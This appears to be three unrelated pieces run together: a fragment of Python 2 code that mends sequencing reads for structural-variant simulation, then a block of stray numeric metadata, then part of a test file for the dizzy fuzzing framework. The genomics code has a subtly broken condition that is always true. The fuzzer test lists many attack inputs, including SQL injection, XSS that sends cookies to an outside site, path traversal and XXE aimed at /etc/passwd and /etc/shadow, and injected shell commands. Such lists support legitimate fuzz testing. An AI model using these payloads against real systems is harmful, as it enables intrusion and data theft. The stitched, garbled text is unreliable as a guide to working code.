elif svtype == "dup" or svtype == "trans_balance" or svtype == "inv" or svtype == "trans_unbalance":
for read_pair_id in reads_left_mend_id:
read_pair = reads_type5_left[read_pair_id]
read_left = copy.deepcopy(read_pair[0])
read_right = copy.deepcopy(read_pair[1])
new_seq_left = mend_read_part(ref, read_left, start, end, "type5", "left", svtype, subPos=subPos)
new_seq_right = mend_read_part(ref, read_right, start, end, "type5", "left", svtype, subPos=subPos)
qual_left = read_left.query_qualities
qual_right = read_right.query_qualities
read_left.query_sequence = new_seq_left
read_right.query_sequence = new_seq_right
read_left.query_qualities = qual_left
read_right.query_qualities = qual_right
total_reads.append([read_left, read_right])
for read_pair_id in reads_right_mend_id:
read_pair = reads_type5_right[read_pair_id]
read_left = copy.deepcopy(read_pair[0])
read_right = copy.deepcopy(read_pair[1])
new_seq_left = mend_read_part(ref, read_left, start, end, "type5", "right", svtype, subPos=subPos)
new_seq_right = mend_read_part(ref, read_right, start, end, "type5", "right", svtype, subPos=subPos)
qual_left = read_left.query_qualities
qual_right = read_right.query_qualities
read_left.query_sequence = new_seq_left
read_right.query_sequence = new_seq_right
read_left.query_qualities = qual_left
read_right.query_qualities = qual_right
total_reads.append([read_left, read_right])
elif svtype == "trans_chrom":
for read_pair_id in reads_left_mend_id:
read_pair = reads_type5_left[read_pair_id]
read_left = copy.deepcopy(read_pair[0])
read_right = copy.deepcopy(read_pair[1])
new_seq_left = mend_read_part(ref, read_left, start, end, "type5", "left", svtype, subPos=subPos)
new_seq_right = mend_read_part(ref, read_right, start, end, "type5", "left", svtype, subPos=subPos)
qual_left = read_left.query_qualities
qual_right = read_right.query_qualities
read_left.query_sequence = new_seq_left
read_right.query_sequence = new_seq_right
read_left.query_qualities = qual_left
read_right.query_qualities = qual_right
total_reads.append([read_left, read_right])
print "deal type5 end......"
return total_reads
def random_mendIDList(totalReadsNum, frac):
if totalReadsNum == 0:
return []
if frac <= 1:
mendList = random.sample(range(totalReadsNum), int(totalReadsNum * frac))
return mendList
elif frac > 1:
cnt = int(frac)
frac_sub = frac / (cnt + 1)
total_mendList = []
for i in range(cnt + 1):
mendList = random.sample(range(totalReadsNum), int(totalReadsNum * frac_sub))
total_mendList.extend(mendList)
return total_mendList
def deal_type6(ref, reads_type1_left, reads_type1_right, freq, start, end, svtype, subPos=None):
print "deal type6 start......"
reads_left_num = len(reads_type1_left)
reads_right_num = len(reads_type1_right)
reads_left_mend_id = random_mendIDList(reads_left_num, freq)
reads_right_mend_id = random_mendIDList(reads_right_num, freq)
total_reads = []
for read_pair_id in reads_left_mend_id:
read_pair = reads_type1_left[read_pair_id]
read = read_pair[0]
new_seq = None
if svtype == "del" or svtype == "inv" or svtype == "trans_balance" or svtype == "trans_unbalance":
if start - read.reference_start >= read.reference_end - start:
new_seq = mend_read_part(ref, read, start, end, "type6", "left", svtype, subPos=subPos)
else:
continue
elif svtype == "dup":
if start - read.reference_start <= read.reference_end - start:
new_seq = mend_read_part(ref, read, start, end, "type6", "left", svtype, subPos=subPos)
else:
continue
if new_seq:
qual = read.query_qualities
read.query_sequence = new_seq
read.query_qualities = qual
total_reads.append([read])
for read_pair_id in reads_right_mend_id:
read_pair = reads_type1_right[read_pair_id]
read = read_pair[0]
new_seq = None
if svtype == "del" or svtype == "inv" or svtype == "trans_balance" or svtype == "trans_unbalance":
if end - read.reference_start <= read.reference_end - end:
new_seq = mend_read_part(ref, read, start, end, "type6", "right", svtype, subPos=subPos)
else:
continue
elif svtype == "dup":
if end - read.reference_start >= read.reference_end - end:
new_seq = mend_read_part(ref, read, start, end, "type6", "right", svtype, subPos=subPos)
else:
continue
if new_seq:
qual = read.query_qualities
read.query_sequence = new_seq
read.query_qualities = qual
total_reads.append([read])
print "deal type6 end......"
return total_reads
def deal_type7(reads_type4, freq, svtype):
print "deal type7 start......"
reads_num = len(reads_type4)
reads_mend_id = random_mendIDList(reads_num, freq)
total_reads = []
if svtype == "del" or "dup" or "trans_unbalance" or svtype == "cnv":
for read_pair_id in reads_mend_id:
total_reads.append(reads_type4[read_pair_id])
return total_reads
| 49.840295
| 130
| 0.562312
| 4,998
| 40,570
| 4.239296
| 0.030612
| 0.063432
| 0.032094
| 0.02643
| 0.898999
| 0.876864
| 0.858505
| 0.852086
| 0.840665
| 0.817821
| 0
| 0.016783
| 0.342051
| 40,570
| 813
| 131
| 49.901599
| 0.776983
| 0.022628
| 0
| 0.819918
| 0
| 0
| 0.051015
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.005457
| null | null | 0.049113
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0fa7067603866e691c6029ce1b8b0324f544ec36
| 120
|
py
|
Python
|
test/test.py
|
AlanMalikov777/ass4_coin_scrapper_webpage
|
88169fe2ce087835fa24ffe075f5d735a0531eef
|
[
"MIT"
] | 1
|
2021-11-04T06:28:43.000Z
|
2021-11-04T06:28:43.000Z
|
test/test.py
|
AlanMalikov777/ass4_coin_scrapper_webpage
|
88169fe2ce087835fa24ffe075f5d735a0531eef
|
[
"MIT"
] | null | null | null |
test/test.py
|
AlanMalikov777/ass4_coin_scrapper_webpage
|
88169fe2ce087835fa24ffe075f5d735a0531eef
|
[
"MIT"
] | null | null | null |
import sys
sys.path.append("..")
from src import news
from src import web_server
from src import dbpy
web_server.start()
| 20
| 26
| 0.783333
| 21
| 120
| 4.380952
| 0.52381
| 0.228261
| 0.423913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 120
| 6
| 27
| 20
| 0.87619
| 0
| 0
| 0
| 0
| 0
| 0.016529
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e889f10acc860bf20d9beca8b6a8febce1a4166e
| 176,445
|
py
|
Python
|
dizzy/tests/test_list.py
|
0xc0decafe/dizzy
|
6cf6abf7a9b990fe77618e42651f3c3d286cc15b
|
[
"BSD-3-Clause"
] | 1
|
2020-11-19T10:11:43.000Z
|
2020-11-19T10:11:43.000Z
|
dizzy/tests/test_list.py
|
0xc0decafe/dizzy
|
6cf6abf7a9b990fe77618e42651f3c3d286cc15b
|
[
"BSD-3-Clause"
] | null | null | null |
dizzy/tests/test_list.py
|
0xc0decafe/dizzy
|
6cf6abf7a9b990fe77618e42651f3c3d286cc15b
|
[
"BSD-3-Clause"
] | 1
|
2020-11-19T10:12:18.000Z
|
2020-11-19T10:12:18.000Z
|
# test_list.py
#
# Copyright 2017 Daniel Mende <mail@c0decafe.de>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from unittest import TestCase, main
from dizzy.tests import first
from dizzy.objects.list import List
from dizzy.value import Value
class TestList(TestCase):
def test_init(self):
f = List("test")
self.assertEqual(f.name, "test")
def test_iter(self):
expected = [Value(b'bla', 24), Value(b'', 0), Value(b'!', 8), Value(b"!'", 16), Value(b'!@#$%%^#$%#$@#$%$$@#$%^^**(()', 232),
Value(b'!@#0%^#0##018387@#0^^**(()', 208), Value(b'"', 8), Value(b'" or "a"="a', 88),
Value(b'" or "x"="x', 88), Value(b'" or 0=0 #', 80), Value(b'" or 0=0 --', 88),
Value(b'" or 1=1 or ""="', 128), Value(b'" or 1=1--', 80), Value(b'"\' or 1 --\'"', 96),
Value(b'") or ("a"="a', 104),
Value(b'"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY>'
b'<!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"', 1152),
Value(b'"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY>'
b'<!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"', 1152),
Value(b'"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[\' or 1=1 or \'\'=\']]>'
b'</foo>"', 704),
Value(b'"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>'
b'alert(\'XSS\');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"', 1104),
Value(b'"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc"">'
b'<xss:xss>XSS</xss:xss></HTML>"', 968),
Value(b'"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert(\'XSS\')""></B></I></xml>'
b'<SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml>'
b'<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"', 1720),
Value(b'"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert(\'XSS\');"">]]>"', 640),
Value(b'"><script>"', 88), Value(b'"><script>alert(1)</script>', 216),
Value(b'"><script>document.location=\'http://your.site.com/cgi-bin/cookie.cgi?\'+document.cookie'
b'</script>', 760),
Value(b'">xxx<P>yyy', 88), Value(b'"\\t"', 32), Value(b'#', 8), Value(b'#'', 56),
Value(b"#'", 16), Value(b'#xA', 24), Value(b'#xA#xD', 48), Value(b'#xD', 24), Value(b'#xD#xA', 48),
Value(b'$NULL', 40), Value(b'$null', 40), Value(b'%', 8),
Value(b'%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%', 512), Value(b'%00', 24),
Value(b'%00../../../../../../etc/passwd', 248), Value(b'%00../../../../../../etc/shadow', 248),
Value(b'%00/', 32), Value(b'%00/etc/passwd%00', 136), Value(b'%01%02%03%04%0a%0d%0aADSF', 200),
Value(b'%08x', 32), Value(b'%0A/usr/bin/id', 112), Value(b'%0A/usr/bin/id%0A', 136),
Value(b'%0Aid', 40), Value(b'%0Aid%0A', 64), Value(b'%0a ping -i 30 127.0.0.1 %0a', 224),
Value(b'%oa ping -n 30 127.0.0.1 %0a', 224), Value(b'%0a id %0a', 80),
Value(b'%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+'
b'<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a', 1136),
Value(b'%0d', 24),
Value(b'%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0a'
b'DATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d'
b'%0a', 1432),
Value(b'%0d%0aX-Injection-Header:%20AttackValue', 312), Value(b'%20', 24),
Value(b'%20$(sleep%2050)', 128), Value(b"%20'sleep%2050'", 120), Value(b'%20d', 32),
Value(b'%20n', 32), Value(b'%20s', 32), Value(b'%20x', 32), Value(b'%20|', 32), Value(b'%21', 24),
Value(b'%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2F'
b'cookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E', 1152),
Value(b'%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25'
b'%5c..%\t\t25%5c..%25%5c..%255cboot.ini', 1016),
Value(b'%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25'
b'%5c..%\t25%5c..%25%5c..%00', 928),
Value(b'%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25'
b'%5c..%25%5c..%25%5c..%00', 920),
Value(b'%2500', 40), Value(b'%250a', 40), Value(b'%26', 24), Value(b'%27%20or%201=1', 112),
Value(b'%28', 24), Value(b'%29', 24), Value(b'%2A', 24),
Value(b'%2A%28%7C%28mail%3D%2A%29%29', 224), Value(b'%2A%28%7C%28objectclass%3D%2A%29%29', 280),
Value(b'%2A%7C', 48), Value(b'%2C', 24), Value(b'%2e%2e%2f', 72), Value(b'%3C', 24),
Value(b'%3C%3F', 48), Value(b'%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E', 360),
Value(b'%3cscript%3ealert("XSS");%3c/script%3e', 304),
Value(b'%3cscript%3ealert(document.cookie);%3c%2fscript%3e', 400), Value(b'%5C', 24),
Value(b'%5C/', 32), Value(b'%60', 24), Value(b'%7C', 24), Value(b'%7f', 24),
Value(b'%99999999999s', 104),
Value(b'%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A'
b'%A%A%A%A%A%A%A%A%A', 864),
Value(b'%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E'
b'%E%E%E%E%E%E%E%E%E', 864),
Value(b'%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F'
b'%F%F%F%F%F%F%F%F%F', 864),
Value(b'%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G'
b'%G%G%G%G%G%G%G%G%G', 864),
Value(b'%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X'
b'%X%X%X%X%X%X%X%X%X', 864),
Value(b'%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a'
b'%a%a%a%a%a%a%a%a%a', 864),
Value(b'%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d'
b'%d%d%d%d%d%d%d%d%d ', 872),
Value(b'%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e'
b'%e%e%e%e%e%e%e%e%e', 864),
Value(b'%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f'
b'%f%f%f%f%f%f%f%f%f', 864),
Value(b'%ff', 24),
Value(b'%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g'
b'%g%g%g%g%g%g%g%g%g', 864),
Value(b'%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i'
b'%i%i%i%i%i%i%i%i%i', 864),
Value(b'%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o'
b'%o%o%o%o%o%o%o%o%o', 864),
Value(b'%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p'
b'%p%p%p%p%p%p%p%p%p', 864),
Value(b'%s%p%x%d', 64),
Value(b'%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s'
b'%s%s%s%s%s%s%s%s%s', 864),
Value(b'%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u'
b'%u%u%u%u%u%u%u%u%u', 864),
Value(b'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x'
b'%x%x%x%x%x%x%x%x%x', 864),
Value(b'&', 8), Value(b'& id', 32), Value(b'& ping -i 30 127.0.0.1 &', 192),
Value(b'& ping -n 30 127.0.0.1 &', 192), Value(b'<', 72), Value(b'<', 80),
Value(b'<', 64), Value(b'<', 72), Value(b'<', 56), Value(b'<', 64),
Value(b'<', 48), Value(b'<', 56), Value(b'<', 40), Value(b'<', 48),
Value(b' ', 40), Value(b' ', 80), Value(b' ', 40), Value(b' ', 80),
Value(b'<', 32), Value(b'<', 40), Value(b'<', 80), Value(b'<', 88),
Value(b'<', 80), Value(b'<', 88), Value(b'<', 72),
Value(b'<', 80), Value(b'<', 72), Value(b'<', 80), Value(b'<', 64),
Value(b'<', 72), Value(b'<', 64), Value(b'<', 72), Value(b'<', 56),
Value(b'<', 64), Value(b'<', 56), Value(b'<', 64), Value(b'<', 48),
Value(b'<', 56), Value(b'<', 48), Value(b'<', 56), Value(b'<', 40),
Value(b'<', 48), Value(b'<', 40), Value(b'<', 48), Value(b'<', 80),
Value(b'<', 88), Value(b'<', 80), Value(b'<', 88),
Value(b'<', 72), Value(b'<', 80), Value(b'<', 72),
Value(b'<', 80), Value(b'<', 64), Value(b'<', 72), Value(b'<', 64),
Value(b'<', 72), Value(b'<', 56), Value(b'<', 64), Value(b'<', 56),
Value(b'<', 64), Value(b'<', 48), Value(b'<', 56), Value(b'<', 48),
Value(b'<', 56), Value(b'<', 40), Value(b'<', 48), Value(b'<', 40),
Value(b'<', 48), Value(b'<', 24), Value(b'<', 32), Value(b''', 48),
Value(b''%20OR', 88), Value(b'&id', 24), Value(b'<', 24), Value(b'<', 32),
Value(b'<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->', 472),
Value(b'<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->', 472),
Value(b'<!--#exec%20cmd="/usr/bin/id;-->', 344),
Value(b"<>"'%;)(&+", 200),
Value(b'<script>alert(document.cookie);<script>alert', 416),
Value(b'<script>alert(document.cookie);</script>', 352), Value(b'";id"', 120),
Value(b"'", 8), Value(b"' (select top 1", 120), Value(b"' --", 32), Value(b"' ;", 24),
Value(b"' UNION ALL SELECT", 144), Value(b"' UNION SELECT", 112), Value(b"' or ''='", 72),
Value(b"' or '1'='1", 88), Value(b"' or '1'='1'--", 112), Value(b"' or 'x'='x", 88),
Value(b"' or (EXISTS)", 104), Value(b"' or 0=0 #", 80), Value(b"' or 0=0 --", 88),
Value(b"' or 1 in (@@version)--", 184), Value(b"' or 1=1 or ''='", 128), Value(b"' or 1=1--", 80),
Value(b"' or a=a--", 80), Value(b"' or uid like '%", 128), Value(b"' or uname like '%", 144),
Value(b"' or user like '%", 136), Value(b"' or userid like '%", 152),
Value(b"' or username like '%", 168), Value(b"'%20or%201=1", 96),
Value(b"'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E", 512),
Value(b'\'\';!--"<XSS>=&{()}', 144), Value(b"') or ('a'='a", 104), Value(b"'--", 24),
Value(b"'; exec master..xp_cmdshell", 216), Value(b"'; exec xp_regread", 144),
Value(b"'; waitfor delay '0:30:0'--", 216),
Value(b'\';alert(String.fromCharCode(88,83,83))//\\\';alert(String.fromCharCode(88,83,83))//";'
b'alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//></SCRIPT>'
b'!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}', 1856),
Value(b"';shutdown--", 96), Value(b"'><script>alert(document.cookie);</script>", 336),
Value(b"'><script>alert(document.cookie)</script>", 328), Value(b"'hi' or 'x'='x';", 128),
Value(b"'or select *", 96), Value(b"'sqlattempt1", 96), Value(b"'||UTL_HTTP.REQUEST", 152),
Value(b"'||Utl_Http.request('http://<yourservername>') from dual--", 464), Value(b'(', 8),
Value(b"(')", 24), Value(b'(sqlattempt2)', 104), Value(b')', 8), Value(b'))))))))))', 80),
Value(b'*', 8), Value(b'*'', 56), Value(b"*'", 16), Value(b'*(|(mail=*))', 96),
Value(b'*(|(objectclass=*))', 152), Value(b'*/*', 24), Value(b'*|', 16), Value(b'+', 8),
Value(b'+%00', 32), Value(b',@variable', 80), Value(b'-', 8), Value(b'--', 16), Value(b"--';", 32),
Value(b'--sp_password', 104), Value(b'-1', 16), Value(b'-1.0', 32), Value(b'-2', 16),
Value(b'-20', 24), Value(b'-268435455', 80), Value(b'..%%35%63', 72), Value(b'..%%35c', 56),
Value(b'..%25%35%63', 88), Value(b'..%255c', 56), Value(b'..%5c', 40), Value(b'..%bg%qf', 64),
Value(b'..%c0%af', 64),
Value(b'..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini', 592),
Value(b'..%u2215', 64), Value(b'..%u2216', 64), Value(b'../', 24),
Value(b'../../../../../../../../../../../../etc/hosts', 360),
Value(b'../../../../../../../../../../../../etc/hosts%00', 384),
Value(b'../../../../../../../../../../../../etc/passwd', 368),
Value(b'../../../../../../../../../../../../etc/passwd%00', 392),
Value(b'../../../../../../../../../../../../etc/shadow', 368),
Value(b'../../../../../../../../../../../../etc/shadow%00', 392), Value(b'..\\', 24),
Value(b'..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd', 320),
Value(b'..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd%00', 344),
Value(b'..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\shadow', 320),
Value(b'..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\shadow%00', 344),
Value(b'.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/passwd', 320),
Value(b'.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/shadow', 320), Value(b'/', 8),
Value(b'/%00/', 40),
Value(b'/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..'
b'%25%5c..%25%5c..%25%5c..%00', 928),
Value(b'/%2A', 32),
Value(b'/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd', 648),
Value(b'/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow', 648),
Value(b'/'', 56), Value(b"/'", 16), Value(b'/,%ENV,/', 64),
Value(b'/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd', 616),
Value(b'/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow', 616),
Value(b'/.../.../.../.../.../', 168), Value(b'/../../../../../../../../%2A', 224),
Value(b'/../../../../../../../../../../../etc/passwd%00.html', 416),
Value(b'/../../../../../../../../../../../etc/passwd%00.jpg', 408),
Value(b'/../../../../../../../../../../etc/passwd', 328),
Value(b'/../../../../../../../../../../etc/passwd^^', 344),
Value(b'/../../../../../../../../../../etc/shadow', 328),
Value(b'/../../../../../../../../../../etc/shadow^^', 344),
Value(b'/../../../../../../../../bin/id|', 256),
Value(b'/..\\../..\\../..\\../..\\../..\\../..\\../boot.ini', 360),
Value(b'/..\\../..\\../..\\../..\\../..\\../..\\../etc/passwd', 376),
Value(b'/..\\../..\\../..\\../..\\../..\\../..\\../etc/shadow', 376),
Value(b'/./././././././././././etc/passwd', 264), Value(b'/./././././././././././etc/shadow', 264),
Value(b'//', 16), Value(b'//*', 24), Value(b'/etc/passwd', 88), Value(b'/etc/shadow', 88),
Value(b'/index.html|id|', 120), Value(b'0', 8), Value(b'0 or 1=1', 64), Value(b'00', 16),
Value(b'0xfffffff', 72), Value(b'1', 8), Value(b'1 or 1 in (@@version)--', 184),
Value(b'1 or 1=1--', 80), Value(b'1.0', 24), Value(b"1; waitfor delay '0:30:0'--", 216),
Value(b'1;SELECT%20*', 96),
Value(b"1||Utl_Http.request('http://<yourservername>') from dual--", 464), Value(b'2', 8),
Value(b'2147483647', 80), Value(b'268435455', 72), Value(b'65536', 40),
Value(b':response.write 111111', 176), Value(b';', 8), Value(b'; ping 127.0.0.1 ;', 144),
Value(b';/usr/bin/id\\n', 112), Value(b';echo 111111', 96), Value(b';id', 24), Value(b';id;', 32),
Value(b';id\\n', 40), Value(b';id|', 32), Value(b';ls -la', 56),
Value(b";system('/usr/bin/id')", 176), Value(b";system('cat%20/etc/passwd')", 224),
Value(b";system('id')", 104), Value(b';|/usr/bin/id|', 112), Value(b'<', 8),
Value(b'< script > < / script>', 184), Value(b'<!', 16),
Value(b"<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>", 624),
Value(b'<![CDATA[<script>var n=0;while(true){n++;}</script>]]>', 432), Value(b'</foo>', 48),
Value(b'<<', 16), Value(b'<<<', 24), Value(b'<<script>alert("XSS");//<</script>', 272),
Value(b'<>"\'%;)(&+', 80), Value(b'<?', 16),
Value(b'<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY>'
b'<!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>', 1088),
Value(b'<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY>'
b'<!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>', 1088),
Value(b'<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY>'
b'<!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>', 1088),
Value(b'<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY>'
b'<!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>', 1080),
Value(b'<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[\' or 1=1 or \'\'=\']]>'
b'</foo>', 656),
Value(b'<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>'
b'alert(\'XSS\');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>', 1056),
Value(b'<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">'
b'<xss:xss>XSS</xss:xss></HTML>', 920),
Value(b'<IMG """><SCRIPT>alert("XSS")</SCRIPT>">', 320),
Value(b'<IMG DYNSRC="javascript:alert(\'XSS\')">', 304),
Value(b'<IMG LOWSRC="javascript:alert(\'XSS\')">', 304),
Value(b'<IMG SRC="  javascript:alert(\'XSS\');">', 352),
Value(b'<IMG SRC="jav\tascript:alert(\'XSS\');">', 296),
Value(b'<IMG SRC="jav	ascript:alert(\'XSS\');">', 336),
Value(b'<IMG SRC="jav
ascript:alert(\'XSS\');">', 336),
Value(b'<IMG SRC="jav
ascript:alert(\'XSS\');">', 336),
Value(b'<IMG SRC="javascript:alert(\'XSS\')"', 272),
Value(b'<IMG SRC="javascript:alert(\'XSS\');">', 288),
Value(b'<IMG SRC=javascrip'
b't:alert('X'
b'SS')>', 1736),
Value(b'<IMG SRC=javascript:ale'
b'rt('XSS')>', 1088),
